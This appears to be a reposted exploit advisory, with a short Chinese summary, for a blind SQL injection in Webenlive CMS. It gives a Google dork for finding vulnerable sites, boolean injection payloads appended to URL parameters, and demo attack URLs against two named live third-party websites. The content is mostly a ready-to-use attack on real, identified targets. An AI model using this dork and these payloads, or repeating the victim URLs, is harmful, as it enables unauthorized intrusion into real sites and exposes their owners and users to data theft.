Webenlive CMS 存在盲 SQL 注入漏洞,攻击者可通过向 URL 添加特定字符串(如 `' and 1=1--+` 和 `' and 1=2--+`)触发响应差异。该漏洞影响多个网站实例。 2025-5-1 18:25:41 Author: cxsecurity.com(查看原文) 阅读量:29 收藏
********************************************************* # Exploit Title: Webenlive CMS - Blind SQL Injection Vulnerability # Date: 2025-04-30 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: "Design Webenlive" # Category: WebApps # Tested On: Windows 10, Firefox, Chrome [+]: Append `' and 1=1--+` and `' and 1=2--+` to the URL and observe the difference in responses. ### Demo 1: * https://idealenglishschool.in/activity-details.php?id=3' and 1=1--+ * https://idealenglishschool.in/activity-details.php?id=3' and 1=2--+ ### Demo 2: * https://berentqatar.com/single-product.php?id=53' and 1=1--+ * https://berentqatar.com/single-product.php?id=53' and 1=2--+ ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh